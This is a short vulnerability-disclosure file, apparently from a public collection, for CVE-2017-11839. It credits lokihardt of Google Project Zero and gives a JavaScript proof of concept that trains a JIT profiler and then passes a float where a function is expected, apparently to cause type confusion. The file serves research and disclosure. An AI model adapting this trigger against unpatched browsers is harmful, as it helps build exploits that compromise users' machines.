Skip to content

Latest commit

 

History

History
35 lines (26 loc) · 612 Bytes

CVE-2017-11839.md

File metadata and controls

35 lines (26 loc) · 612 Bytes
Raw

CVE-2017-11839

  • Fix: Nov 2017
  • Credit: lokihardt of Google Project Zero

PoC

function opt2(inlinee, v) {
    if (v > 0) {
        inlinee();
    } else {
        inlinee.x = 1.1;
    }
}

function opt() {
    opt2(2.3023e-320, null);
}

function main() {
    opt2(() => {}, 1);  // feed a function to the profiler

    for (let i = 0; i < 10000; i++) {
        opt();
    }
}

main();

Reference